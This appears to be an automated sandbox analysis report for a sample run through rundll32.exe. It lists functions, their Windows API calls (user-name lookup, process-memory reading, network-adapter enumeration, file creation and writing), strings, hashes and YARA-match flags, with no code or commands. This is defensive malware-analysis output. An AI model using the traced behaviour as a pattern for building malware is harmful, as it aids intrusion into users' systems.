Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 4b604e108877968c219f2e74a8e774dbf910cb257f067938a332943780c57221
Instruction ID: f0af8c3a17777f54f86ab4e3a5ebdc79cea8af78f1ad0eae229ef8ee957ed511
Opcode Fuzzy Hash: 4b604e108877968c219f2e74a8e774dbf910cb257f067938a332943780c57221
Instruction Fuzzy Hash: 1E21C070905B84DED721CFA8C904B4BBFF4EF1A710F14869EE49597781D3B9A604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006FF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006FF09F

Strings

false, xrefs: 006FF0F6
true, xrefs: 006FF109

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 51641ac2619b28f0550d1ef44dec8f673b779b5ef67e67c35b0fee47b1d87870
Instruction ID: 7d21bd0f63d9569267ce263b8122122a8eb57ecb4eb36c0f418c85c7049693df
Opcode Fuzzy Hash: 51641ac2619b28f0550d1ef44dec8f673b779b5ef67e67c35b0fee47b1d87870
Instruction Fuzzy Hash: E81190B1945748EFC720EFB4D841BAAB7F4AF15300F04C52AE5958B382EB35E505CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00700D24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00700D30
std::_Lockit::~_Lockit.LIBCPMT ref: 00700D8B

Strings

2q, xrefs: 00700D55, 00700D6F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 2q
API String ID: 593203224-950290719
Opcode ID: 85edaa11b544d30cfc82bbd5e824ac726e3070705e0c89ae57c5326d4dda4e9c
Instruction ID: f3a3e023911b3f9cb30d8b92955f9ca2ed12f7d7975e25eec92f4c55276512e1
Opcode Fuzzy Hash: 85edaa11b544d30cfc82bbd5e824ac726e3070705e0c89ae57c5326d4dda4e9c
Instruction Fuzzy Hash: 37019E35600608EFCB14DF58C859A9D7BB9EF84760F144099E8059B3A1EB74FE40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0072776F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 007277AF

Strings

2q, xrefs: 0072779F
InitializeCriticalSectionEx, xrefs: 0072777F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: 2q$InitializeCriticalSectionEx
API String ID: 2593887523-845050285
Opcode ID: 52a780ed382006fd629cd8285b90986606f40323a1de0e11d159f80fc71f521d
Instruction ID: 89b30d0f2ca82c81c04c2d461afb99bbbcaf300ff21d374604d625e063e1a5ce
Opcode Fuzzy Hash: 52a780ed382006fd629cd8285b90986606f40323a1de0e11d159f80fc71f521d
Instruction Fuzzy Hash: AFE0D87218422CFBEB251F61ED09D8E7F21EF44761F008410FE0865261DBB98820DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00727559 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0072758D

Strings

2q, xrefs: 00727583
FlsAlloc, xrefs: 00727569

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Alloc
String ID: 2q$FlsAlloc
API String ID: 2773662609-1783644098
Opcode ID: 7ff7a7b5d6e9fa9f81c0ba69158822d043f1bd3b072607713bb0afa42070f7dc
Instruction ID: 25c0daf1fb269d46edfdb83fe12f4dc7c865f0852bf485ed3fa6992ac56e2622
Opcode Fuzzy Hash: 7ff7a7b5d6e9fa9f81c0ba69158822d043f1bd3b072607713bb0afa42070f7dc
Instruction Fuzzy Hash: 42E0C2B268833CF7E7282762BD0AD9EB914AF44B61F040020FE041A2929BAE8951D2D5

Uniqueness

Uniqueness Score: -1.00%

Function 00727915 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(0074E428), ref: 00727932

Strings

(t, xrefs: 00727921
xt, xrefs: 0072793E

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FreeLibrary
String ID: (t$xt
API String ID: 3664257935-1085984829
Opcode ID: bc794ea8512f4c541e3e8b4b256fc90315d5303cc89a2e01c6da361ac86552b9
Instruction ID: cd5ad40509cd090f6b541850d208a2aad081a9b5fbe74e1433a9ebe90083c514
Opcode Fuzzy Hash: bc794ea8512f4c541e3e8b4b256fc90315d5303cc89a2e01c6da361ac86552b9
Instruction Fuzzy Hash: 69E08632C0836597EB351F0CE50476077D45750332F250139E4DC1119093792CD1C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 006F4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,006F4261,00734400,000000FF,DBD9785B,00000000,?,00000000,?,?,?,00734400,000000FF,?,006F3A75,?), ref: 006F4096
LocalAlloc.KERNEL32(00000040,40000022,DBD9785B,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 006F4154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,DBD9785B,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 006F4177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 006F4217

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 9a446604a4cdb386f62ec7f46bb8d5317feb750a34ff023de3311b7cdd41782f
Instruction ID: 16df08bdd3242724e53b6084d0ff43bf39f927e2d182c748e24b6d3ef74d5179
Opcode Fuzzy Hash: 9a446604a4cdb386f62ec7f46bb8d5317feb750a34ff023de3311b7cdd41782f
Instruction Fuzzy Hash: B951A4B5A002099FDB18DF6CC885ABEBBB6FB48350F14462DE525E7780DB35AE40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 006F1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 006F1E01
LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 006F1E21
LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 006F1EA7
LocalFree.KERNEL32(00000001,DBD9785B,00000000,00000000,00733C40,000000FF,?,00000000), ref: 006F1F2D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 3b0e585813f08681e63734bfba8bbe65c366340e4a5221d6f9e844069a560104
Instruction ID: 1a7a09b649b68937689c8b95de9a1083ee78bfee0866000a17178d121289d4ad
Opcode Fuzzy Hash: 3b0e585813f08681e63734bfba8bbe65c366340e4a5221d6f9e844069a560104
Instruction Fuzzy Hash: 5F51B472504219DFC715DF28D880AAAB7EAFF49350F11066EF955DB390D730D9048B95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 2700, Parent PID: 5988COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	98.2%
Signature Coverage:	24.8%
Total number of Nodes:	383
Total number of Limit Nodes:	10

Executed Functions

Function 00000187EC85463C Relevance: 15.3, APIs: 10, Instructions: 291
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00000187EC854666
GetCurrentProcessId.KERNEL32 ref: 00000187EC854673

Part of subcall function 00000187EC858AE0: GetUserNameA.ADVAPI32 ref: 00000187EC858B08
Part of subcall function 00000187EC858AE0: wsprintfA.USER32 ref: 00000187EC858B25

GetCurrentProcessId.KERNEL32 ref: 00000187EC854743
GetCurrentProcessId.KERNEL32 ref: 00000187EC85478D
OpenProcess.KERNEL32 ref: 00000187EC85479D
NtQueryInformationProcess.NTDLL ref: 00000187EC854800
ReadProcessMemory.KERNEL32 ref: 00000187EC854873
ReadProcessMemory.KERNEL32 ref: 00000187EC8548CD

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

WideCharToMultiByte.KERNEL32 ref: 00000187EC854946
CloseHandle.KERNEL32 ref: 00000187EC854B2C

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CurrentMemory$HandleRead$AllocateByteCharCloseInformationModuleMultiNameOpenQueryUserVirtualWidewsprintf
String ID:
API String ID: 3997021431-0
Opcode ID: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
Instruction ID: 9f0292a4ad6aefa45d4eaefc4b7985995c549affc187d498afc4c40ab23274b7
Opcode Fuzzy Hash: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
Instruction Fuzzy Hash: A7F10B3962CA84D5EB60DB14E5843DA73A0F7C4784F609165EB8D87AE9DFBCC644CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00000187EC8575E3

Part of subcall function 00000187EC857414: GetFileAttributesW.KERNEL32 ref: 00000187EC857428

NtCreateFile.NTDLL ref: 00000187EC857662
NtClose.NTDLL ref: 00000187EC857680

Strings

@, xrefs: 00000187EC8575C0
0, xrefs: 00000187EC8575CB

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateInitStringUnicode
String ID: 0$@
API String ID: 2504508917-1545510068
Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction ID: 8442e2ac053addb6841c0aa9fa20b6bc49a4897144528033d5a51168a9eda843
Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction Fuzzy Hash: F821937612868086E7609F14E5943DBB7A0F3C0348F608166E7C946AE9DFBDDA49CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8577B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00000187EC85781B
NtCreateFile.NTDLL ref: 00000187EC857898

Strings

@, xrefs: 00000187EC85782E
0, xrefs: 00000187EC857803

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID: 0$@
API String ID: 2498367268-1545510068
Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction ID: f8f2e7761a29d2bff212819df968181b15def4dc9177f68eaed1ecf306d1f6f7
Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction Fuzzy Hash: 3A21BF7251878486E760CF14F49478AB7A0F3C4398F50821AE2D947AA8CBBDD559CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8568E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00000187EC856910

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

GetAdaptersInfo.IPHLPAPI ref: 00000187EC85693B

Strings

o, xrefs: 00000187EC85691A

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2718687846-252678980
Opcode ID: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
Instruction ID: 51ef73d7188408a0eedd39cb18585d9550785cb911db94d25241ac4589419d84
Opcode Fuzzy Hash: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
Instruction Fuzzy Hash: 9E11E57A518B4086E7709B15E18439EB7A0F3C87A9F544255E68D46BA8DFBCC684CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85B0C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenKey.NTDLL ref: 00000187EC85B136

Strings

0, xrefs: 00000187EC85B108
@, xrefs: 00000187EC85B110

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Open
String ID: 0$@
API String ID: 71445658-1545510068
Opcode ID: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
Instruction ID: 8bfd9d1b70a2c9b702d9a336c128ef9f56df07552ced8e6534792b030ab1c0ee
Opcode Fuzzy Hash: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
Instruction Fuzzy Hash: D2014F76228680C6D760DF10E48039BB7A4F3D43D4FA08115E7C982AA9DFBCC655CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC858AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00000187EC858B08
wsprintfA.USER32 ref: 00000187EC858B25

Strings

alfons, xrefs: 00000187EC858B1E, 00000187EC858B2B

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: NameUserwsprintf
String ID: alfons
API String ID: 54179028-1092396413
Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction ID: 8e724ebebb6caa2b71033a90ddd0e07408bb7bd7b4a29287413b945c740ebf69
Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction Fuzzy Hash: F8F09875238592D2EA50AB10E9803E97361F7C0744FD09061A15A465D5DF6CC71ADB48

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85B1D4 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
Instruction ID: 1de1aba30135a283f9a3d6c14b6ca445bac528d957be64ad84e4fd9a1b28b72f
Opcode Fuzzy Hash: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
Instruction Fuzzy Hash: 2D41EC3A229A8086DB50DB15E5C47AEB7A0F7C4784F609055FB8E87BA9DF7CC645CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85A350 Relevance: 4.6, APIs: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
Instruction ID: 2c01db4dc829b41db328e17d5ca6bc7ea0f6b0502fee4202d7258cc3e21857f7
Opcode Fuzzy Hash: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
Instruction Fuzzy Hash: AC31213A12CA8085EA70DB10E5C43EE7365F7C4394F608365A7AE426D9DFBCC614C704

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85AD34 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

Strings

@, xrefs: 00000187EC85AD46

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction ID: f92c2c6a219e023f71200ad69d60a523f67b52000e7879fe46963623b777bf59
Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction Fuzzy Hash: 15E0AC7663868082D6509F55E49478AB760F7C47B4F505305BAA956AD8CFBCC1148B44

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8578C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00000187EC85AD34: NtAllocateVirtualMemory.NTDLL ref: 00000187EC85AD6A

NtReadFile.NTDLL ref: 00000187EC85799F

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateFileMemoryReadVirtual
String ID:
API String ID: 1637922817-0
Opcode ID: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
Instruction ID: 57f55bb78835500ff04e08c80a8f4903d9316daea9719b87dcd3b144d5ea3063
Opcode Fuzzy Hash: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
Instruction Fuzzy Hash: 6E21C976218BC48AD760CB55E59039AB7A5F3C8790F908425EBCD83B98DFBCC5548F04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8579C8 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID:
API String ID: 2498367268-0
Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction ID: 044e9d7d47a2fa089b9465aca4538000bdfe8025256205a23d1283f74e68c126
Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction Fuzzy Hash: F001977A228640C6D630DB15E58065ABBA0F7D9788F608155EBCC87A99DF7DCB458F00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85378C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00000187EC8537F6

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
Instruction ID: c9f72e8945ddb695beb7bd86de06fd53ce98cc0fab60d53ad55dd3adb579ab4b
Opcode Fuzzy Hash: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
Instruction Fuzzy Hash: 40F03776228A4086E6709B10E58079A6A60F7D43A8F604354EBA946BD9DFBDC3448B04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857A54 Relevance: 1.5, APIs: 1, Instructions: 25filenativeCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 00000187EC857AAB

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction ID: f234e881fd353f44efeae075eb9e34f073626ec33a0a20bbadcc08b2687b25f5
Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction Fuzzy Hash: 56F0973652CB9086D360CB64F48474BB7A4F3C4394F609525E7C982F68DBBCC2548F40

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857B40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 00000187EC857B71

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction ID: 12ae387003c758260ea60a8d049a350980678926fccf098d6460e88c2065919b
Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction Fuzzy Hash: A8E0E675518A8191D7609B50E4447897770F3853B4FA44315E7F941AE4CF7CC249CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070044 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 116
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6

Strings

w, xrefs: 0000000180070088
k, xrefs: 0000000180070093
)RxR, xrefs: 0000000180070080
pOdy, xrefs: 0000000180070070
S5Xl, xrefs: 0000000180070068
MN(U, xrefs: 0000000180070078

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: )RxR$MN(U$S5Xl$k$pOdy$w
API String ID: 4275171209-2056616801
Opcode ID: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
Instruction ID: 4deb1cea13ac9b666c555f1b3f310a4baaf57dd73fee47670c94506e3a1fa1fc
Opcode Fuzzy Hash: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
